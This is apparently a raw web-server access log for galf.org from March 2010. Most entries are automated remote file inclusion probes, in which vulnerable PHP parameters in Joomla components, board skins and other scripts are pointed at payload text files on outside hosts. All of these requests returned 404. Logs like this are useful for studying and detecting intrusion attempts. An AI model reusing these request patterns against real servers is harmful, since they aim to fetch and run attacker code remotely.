85.12.33.30 - - [01/Mar/2010:01:16:17 -0800] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:16:17 -0800] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.12.33.30 - - [01/Mar/2010:01:16:17 -0800] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:16:17 -0800] "GET /logs/access_100222.log%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.114.35 - - [01/Mar/2010:01:17:00 -0800] "GET /logs/?S=D HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:01:17:57 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.ranking1.com/smartshop/data/download/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:01:17:57 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://www.ranking1.com/smartshop/data/download/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:01:18:00 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.ranking1.com/smartshop/data/download/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:01:18:00 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://www.ranking1.com/smartshop/data/download/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:01:18:00 -0800] "GET /logs/access_100215.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://www.ranking1.com/smartshop/data/download/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:01:18:01 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://www.ranking1.com/smartshop/data/download/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [01/Mar/2010:01:18:39 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [01/Mar/2010:01:18:39 -0800] "GET /logs/access_100104.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [01/Mar/2010:01:18:39 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:01:18:50 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.80.193.35 - - [01/Mar/2010:01:19:18 -0800] "GET /labia23portugues/index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IEMB3; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:01:19:40 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:01:19:41 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:01:19:47 -0800] "GET /logs/access_100104.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:21:12 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:22:32 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:22:32 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:22:32 -0800] "GET /logs/access_090921.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:23:03 -0800] "GET /logs/access_090921.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:23:03 -0800] "GET /logs/access_090810.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:25:00 -0800] "GET /logs/access_100222.log///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:25:07 -0800] "GET /logs/access_100222.log///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:20 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:20 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:21 -0800] "GET /logs/access_100222.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:21 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:21 -0800] "GET /logs/access.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:21 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:33 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:33 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:33 -0800] "GET /logs/access_100222.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:33 -0800] "GET /logs/access.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:34 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:34 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:47 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:47 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:47 -0800] "GET /logs/access_100222.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:47 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:47 -0800] "GET /logs/access.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:48 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:56 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:56 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:56 -0800] "GET /logs/access_100222.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:56 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:56 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:32:56 -0800] "GET /logs/access.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs/access_100222.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs/access.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs/access_100222.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:33:00 -0800] "GET /logs/access.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [01/Mar/2010:01:33:53 -0800] "GET /logs/phphtml.php?htmlclass_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:33:53 -0800] "GET /phphtml.php?htmlclass_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:33:55 -0800] "GET /logs/access_091116.log%20%20/phphtml.php?htmlclass_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:34:57 -0800] "GET /logs/access_090824.log%20%20/phphtml.php?htmlclass_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:35:36 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:35:36 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:35:37 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:35:57 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:35:57 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:35:57 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:35:59 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:36:16 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:38:41 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:38:41 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:38:41 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:38:56 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:39:20 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:39:20 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:39:20 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:39:37 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:34 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:34 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:34 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:34 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:39 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:39 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:39 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:01:42:39 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:44:49 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:44:50 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:44:50 -0800] "GET /logs/access_100215.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:46:03 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:46:04 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:46:04 -0800] "GET /logs/access_100215.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:46:32 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:01:46:33 -0800] "GET /logs/access_100215.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:48:04 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:48:04 -0800] "GET /logs/access_100215.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:48:04 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:48:58 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:48:58 -0800] "GET /logs/access_100215.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:48:58 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [01/Mar/2010:01:49:16 -0800] "GET /logs/access_100104.log/errors.php?error=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [01/Mar/2010:01:49:16 -0800] "GET /logs/errors.php?error=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [01/Mar/2010:01:49:16 -0800] "GET /errors.php?error=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [01/Mar/2010:01:49:21 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [01/Mar/2010:01:49:21 -0800] "GET /logs/access_100118.log//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [01/Mar/2010:01:49:21 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [01/Mar/2010:01:49:26 -0800] "GET /logs/access_100118.log//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [01/Mar/2010:01:49:26 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [01/Mar/2010:01:49:26 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [01/Mar/2010:01:49:29 -0800] "GET /logs/access_091228.log/errors.php?error=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:50:01 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:50:02 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:50:02 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:50:18 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
